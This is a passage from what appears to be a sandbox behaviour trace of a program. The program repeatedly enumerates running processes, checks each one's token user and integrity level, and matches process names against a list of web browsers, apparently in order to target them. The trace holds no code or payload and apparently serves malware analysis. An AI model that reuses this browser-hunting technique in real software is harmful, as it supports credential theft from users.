returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0561.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0561.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0561.172] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0561.172] GetLastError () returned 0x7a [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0561.172] CloseHandle (hObject=0x29c) returned 1 [0561.172] CloseHandle (hObject=0x298) returned 1 [0561.172] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0561.172] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0561.172] GetLastError () returned 0x7a [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0561.172] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0561.172] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0561.172] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0561.172] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0561.172] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0561.172] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0561.172] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0561.172] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0561.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0561.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0561.172] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0561.172] GetLastError () returned 0x7a [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0561.172] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0561.172] CloseHandle (hObject=0x29c) returned 1 [0561.172] CloseHandle (hObject=0x298) returned 1 [0561.172] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0561.173] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0561.173] GetLastError () returned 0x7a [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0561.173] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0561.173] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0561.173] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0561.173] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0561.173] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0561.173] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0561.173] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0561.173] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0561.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0561.173] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0561.173] GetLastError () returned 0x7a [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0561.173] CloseHandle (hObject=0x29c) returned 1 [0561.173] CloseHandle (hObject=0x298) returned 1 [0561.173] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0561.173] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0561.173] GetLastError () returned 0x7a [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0561.173] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0561.173] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0561.173] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0561.173] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0561.173] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0561.173] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0561.173] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0561.173] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0561.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0561.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0561.173] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0561.173] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0561.174] GetLastError () returned 0x7a [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0561.174] CloseHandle (hObject=0x29c) returned 1 [0561.174] CloseHandle (hObject=0x298) returned 1 [0561.174] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0561.174] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0561.174] GetLastError () returned 0x7a [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0561.174] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0561.174] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0561.174] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0561.174] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0561.174] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0561.174] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0561.174] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0561.174] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0561.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0561.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0561.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0561.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0561.174] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0561.174] GetLastError () returned 0x7a [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0561.174] CloseHandle (hObject=0x29c) returned 1 [0561.174] CloseHandle (hObject=0x298) returned 1 [0561.174] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0561.174] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0561.174] GetLastError () returned 0x7a [0561.174] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0561.174] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0561.174] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0561.175] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0561.175] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0561.175] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0561.175] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0561.175] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0561.175] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0561.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0561.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0561.175] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0561.175] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0563.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9ed8) returned 0xc0000004 [0563.192] VirtualAlloc (lpAddress=0x0, dwSize=0xaed8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0563.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaed8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0563.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0563.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0563.194] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0563.194] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0563.194] GetLastError () returned 0x7a [0563.195] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0563.195] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0563.195] CloseHandle (hObject=0x29c) returned 1 [0563.195] CloseHandle (hObject=0x298) returned 1 [0563.195] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0563.195] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0563.195] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0563.195] GetLastError () returned 0x7a [0563.195] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0563.195] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0563.195] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0563.195] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0563.195] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0563.195] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0563.195] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0563.195] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0563.196] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0563.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0563.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0563.196] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0563.196] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0563.196] GetLastError () returned 0x7a [0563.196] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0563.196] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0563.196] CloseHandle (hObject=0x29c) returned 1 [0563.196] CloseHandle (hObject=0x298) returned 1 [0563.196] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0563.196] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0563.196] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0563.196] GetLastError () returned 0x7a [0563.196] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0563.196] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0563.196] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0563.197] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0563.197] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0563.197] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0563.197] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0563.197] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0563.197] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0563.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0563.197] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0563.197] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0563.197] GetLastError () returned 0x7a [0563.197] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0563.197] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0563.197] CloseHandle (hObject=0x29c) returned 1 [0563.197] CloseHandle (hObject=0x298) returned 1 [0563.197] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0563.197] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0563.197] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 